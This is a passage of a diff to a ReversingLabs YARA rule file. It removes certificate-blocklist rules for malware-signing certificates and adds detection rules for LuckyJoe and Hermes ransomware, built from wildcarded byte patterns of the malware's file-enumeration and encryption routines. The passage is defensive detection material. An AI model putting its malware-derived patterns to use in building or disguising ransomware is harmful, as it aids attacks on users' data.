+            ?? ?? ?? 33 C0 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 58 E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ??
+            C6 45 ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 10 FF 52 ?? 8B D8
+            4B 85 DB 0F 8C ?? ?? ?? ?? 43 33 F6 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 8D ??
+            ?? ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B D6 8B 38 FF 57 ?? 8B
+            85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 58 E8 ?? ?? ?? ?? 75 ?? C6 45 ?? ??
+            46 4B 0F 85 ?? ?? ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 A1 ?? ?? ??
+            ?? 50 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 15 ?? ?? ??
+            ?? 83 C0 ?? 83 D2 ?? 89 05 ?? ?? ?? ?? 89 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ??
+            ?? ?? 8B 10 FF 92 ?? ?? ?? ?? 84 C0 75 ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLIM DOG GROUP SP Z O O" and pe.signatures [ i ] . serial == "0d:dc:e8:cd:c9:1b:5b:64:9b:b4:b4:5f:fb:ba:6c:6c" and 1580722435 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( all of ( $enum_and_encrypt_files_* ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_9Bd614D5869Bb66C96B67E154D517384 : INFO FILE
+rule REVERSINGLABS_Linux_Ransomware_Luckyjoe : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects LuckyJoe ransomware."
 		author = "ReversingLabs"
-		id = "eb42b516-aac6-5bee-af1d-70e0e66700f5"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "8dc98d71-b79d-5b09-9383-11f2b57baeb5"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3752-L3770"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Linux.Ransomware.LuckyJoe.yara#L1-L146"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d9eea38a1340797cef129b12cf2bb46c444e6f312db7356260f0ac0d9e63183d"
+		logic_hash = "1e7df2c45bee072af233cf8f355a84ec931fe96afa3fbdcd225dded1b75ea961"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "LuckyJoe"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\"CENTR MBP\"" and ( pe.signatures [ i ] . serial == "00:9b:d6:14:d5:86:9b:b6:6c:96:b6:7e:15:4d:51:73:84" or pe.signatures [ i ] . serial == "9b:d6:14:d5:86:9b:b6:6c:96:b6:7e:15:4d:51:73:84" ) and 1581618180 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_540Cea639D5D48669B7F2F64 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "bfc514b6-43ef-5343-b5f2-d39168ba3e8d"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3772-L3788"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3d3774f10ff9949ea13a7892662438b84b3eb895fc986092649fa9b192170d48"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$main_call_p1 = {
+            55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? 48
+            C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ??
+            48 89 45 ?? 48 8B 55 ?? 48 8B 45 ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 75 ?? 48
+            8B 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? BE ?? ??
+            ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 89 C7 E8
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? E8 ?? ??
+            ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 35 ?? ?? ?? ?? 48 83 EC ?? 48 8B 45
+            ?? 6A ?? 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C7
+            E8 ?? ?? ?? ?? 48 83 C4 ?? 48 8B 15 ?? ?? ?? ?? 48 8B 45 ?? 48 89 D6 48 89 C7 E8 ??
+            ?? ?? ?? 48 8B 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ??
+            ?? ?? 48 98 48 89 45 ?? 48 8B 45 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48
+        }
+		$main_call_p2 = {
+            89 C7 E8 ?? ?? ?? ?? 48 98 48 89 45 ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ??
+            ?? 48 89 45 ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45
+            ?? 89 C2 48 8B 4D ?? 48 8B 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 89 C2
+            48 8B 4D ?? 48 8B 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 8B 55 ?? 48 8B 45 ?? 48
+            01 D0 C6 00 ?? 48 8B 55 ?? 48 8B 45 ?? 48 01 D0 C6 00 ?? 48 8B 45 ?? 48 8B 55 ?? 48
+            89 D6 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 75 ?? BF ?? ?? ?? ?? E8 ??
+            ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? B8
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 45 ??
+            48 83 7D ?? ?? 74 ?? 48 8B 55 ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8
+        }
+		$main_call_p3 = {
+            E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? 48 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? B8 ?? ??
+            ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 89 C7 E8 ?? ??
+            ?? ?? 48 C7 45 ?? ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 45
+            ?? 48 83 7D ?? ?? 74 ?? EB ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? 48 8B 55 ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            89 45 ?? 83 7D ?? ?? 79 ?? 48 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? EB ?? 48 8B 45 ?? 48 89
+            C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 89 C7 E8 ?? ?? ?? ?? EB ?? BF ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ??
+            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 48 98 48 8B 84
+            C5 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 48 98
+            48 8B 84 C5 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 83 7D ?? ?? 74 ?? BF ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8
+            ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? C9 C3
+        }
+		$encrypt_files_p1 = {
+            55 48 89 E5 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ??
+            ?? ?? ?? B9 ?? ?? ?? ?? 48 89 C7 48 89 D6 F3 48 A5 48 89 F2 48 89 F8 0F B7 0A 66 89
+            08 48 8D 40 ?? 48 8D 52 ?? 48 C7 45 ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            48 C7 45 ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 D7
+            F3 48 AB 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 75
+            ?? 48 8B 85 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89 C7
+            E8 ?? ?? ?? ?? 48 8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ??
+            48 89 C7 E8 ?? ?? ?? ?? 48 89 C3 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48
+            01 D8 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 85 ?? ?? ?? ?? BE ?? ??
+            ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 45 ?? 48 8D 48 ?? 48 8B 95 ?? ?? ??
+            ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 8B 45
+            ?? 48 8D 48 ?? 48 8B 95 ?? ?? ?? ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 4D ?? 48 8D 85 ?? ?? ?? ?? 48 89 CE 48
+            89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? EB ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 C7 E8 ?? ?? ??
+            ?? 48 89 C2 48 8B 45 ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 45 ?? 48
+        }
+		$encrypt_files_p2 = {
+            89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ??
+            ?? EB ?? 48 8D 95 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            89 45 ?? 48 83 7D ?? ?? 75 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48
+            8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? BE ?? ?? ?? ??
+            48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? BE ?? ?? ??
+            ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C0 ?? 48 89 45
+            ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C3 48 8B 45 ?? 48 89 C7 E8 ??
+            ?? ?? ?? 48 01 D8 48 83 C0 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 85 ?? ?? ??
+            ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 45 ?? 48 8D 48 ?? 48 8B
+            95 ?? ?? ?? ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
+            ?? 48 8B 45 ?? 48 8D 48 ?? 48 8B 95 ?? ?? ?? ?? 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89
+            C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 83 7D ?? ?? 0F
+            85 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D C3
+        }
+		$encrypt_internal_message_p1 = {
+            55 48 89 E5 53 48 83 EC ?? 48 89 7D ?? 48 89 75 ?? 48 C7 45 ?? ?? ?? ?? ?? BF ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 48 8B
+            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 83 C0 ?? 48 98 48 89 C7 E8 ?? ?? ??
+            ?? 48 89 45 ?? 8B 45 ?? 83 C0 ?? 48 63 D0 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ??
+            ?? ?? ?? 8B 45 ?? 48 63 D0 48 8B 4D ?? 48 8B 45 ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ??
+            8B 45 ?? 48 98 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 8B 45 ?? 83 E8 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 66 0F EF C0 F2 0F 2A 45 ??
+            66 0F EF C9 F2 0F 2A 4D ?? F2 0F 5E C1 E8 ?? ?? ?? ?? F2 0F 2C C0 89 45 ?? 8B 45 ??
+            0F AF 45 ?? 48 98 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 8B 45 ?? 0F AF 45 ?? 48 63 D0
+            48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 45 ?? 0F AF 45 ?? 89 C3 48 8B
+            45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 8B 45 ?? 89 C1 89 DA BF ?? ?? ?? ?? B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? E9 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? 3B 45 ?? 7D ?? 8B 45 ?? 2B 45 ?? 89 45 ?? 8B 45
+            ?? 48 63 D0 48 8B 45 ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? 89
+        }
+		$encrypt_internal_message_p2 = {
+            C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 48 63 D0 48 8B 45 ?? 48 8D
+            34 02 48 8B 4D ?? 48 8B 55 ?? 8B 45 ?? 41 B8 ?? ?? ?? ?? 89 C7 E8 ?? ?? ?? ?? 89 45
+            ?? 8B 45 ?? 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 75 ?? E8
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C2 48 8B 45 ?? 48 89 C6 48 89 D7 E8 ?? ?? ?? ?? 48
+            8B 05 ?? ?? ?? ?? 48 8B 55 ?? BE ?? ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ??
+            48 89 C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? 8B 45 ?? 48 63 D0 8B 45 ?? 48 63 C8 48 8B 45 ?? 48 01 C1 48 8B 45 ?? 48 89 C6
+            48 89 CF E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ??
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 01 45 ?? 8B 45 ?? 01 45 ?? 48 8B 45 ?? 48 89
+            C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 8B 45 ?? 3B 45 ?? 0F 8E ?? ?? ?? ?? 48 8B 45 ?? 48 89
+            C7 E8 ?? ?? ?? ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 8B 4D ?? 48 8B 45 ?? BA ?? ??
+            ?? ?? 89 CE 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ??
+            48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 83 C4 ?? 5B 5D
+            C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CENTR MBP LLC" and pe.signatures [ i ] . serial == "54:0c:ea:63:9d:5d:48:66:9b:7f:2f:64" and 1570871755 <= pe.signatures [ i ] . not_after )
+		uint32( 0 ) == 0x464C457F and ( all of ( $main_call_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $encrypt_internal_message_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_03A7748A4355020A652466B5E02E07De : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Hermes : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Hermes ransomware."
 		author = "ReversingLabs"
-		id = "10134543-04fa-5a2f-8f77-98444ad1d7f0"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "1f1f363a-5be0-59e5-b1c1-5e277922790c"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3790-L3806"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Hermes.yara#L1-L284"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6dc6d0fd2b702939847981ff31c2d8103227ccd0c19f999849ff89c64a90f92f"
+		logic_hash = "6db95c422ee2f9dd8a1795031ee8d7d5ed84e16cde47512becc006b6a849e890"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Hermes"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$hermes_find_files_v1_p1 = {
+            A5 A5 A5 8D BD ?? ?? ?? ?? 66 AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? A5 A5 66 A5 68 ??
+            ?? ?? ?? 8D BD ?? ?? ?? ?? 50 AB 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 65
+            ?? ?? 8B 5D ?? 8B FB 4F 4F 8D 47 ?? 66 8B 4F ?? 47 47 66 85 C9 75 ?? BE ?? ?? ?? ??
+            A5 A5 8D 8D ?? ?? ?? ?? 51 50 66 A5 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 89 45 ?? E8
+            ?? ?? ?? ?? 59 59 8B C8 E8 ?? ?? ?? ?? 8B CB 8B D0 E8 ?? ?? ?? ?? 2B C2 33 C9 83 7D
+            ?? ?? 66 89 0C 43 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ??
+            8B C1 6A ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ??
+            8B C1 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 75
+            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 7D ?? A5 A5 A5 A5 33
+        }
+		$hermes_find_files_v1_p2 = {
+            C0 6A ?? 59 6A ?? 8D 7D ?? 66 AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 59 BE ?? ??
+            ?? ?? 8D BD ?? ?? ?? ?? F3 A5 BE ?? ?? ?? ?? 8D 7D ?? A5 A5 A5 A5 6A ?? 59 8D 7D ??
+            AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 8D BD ?? ?? ?? ?? AB AB 66 AB BE ?? ?? ??
+            ?? 8D 7D ?? A5 A5 A5 A5 33 C0 6A ?? 8D 7D ?? AB 59 BE ?? ?? ?? ?? 8D BD ?? ?? ?? ??
+            F3 A5 66 A5 8D BD ?? ?? ?? ?? AB BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? A5 A5 A5 A5 8D BD
+            ?? ?? ?? ?? AB AB AB 66 AB 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85
+            C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59
+            85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59
+            59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D
+            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50
+            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 0F
+        }
+		$hermes_find_files_v1_p3 = {
+            84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 59 59 85 C0 75 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59
+            85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F
+            85 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F
+            85 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D
+        }
+		$hermes_find_files_v1_p4 = {
+            45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 45
+            ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 85 C0 0F 85 ?? ?? ?? ?? F6 85
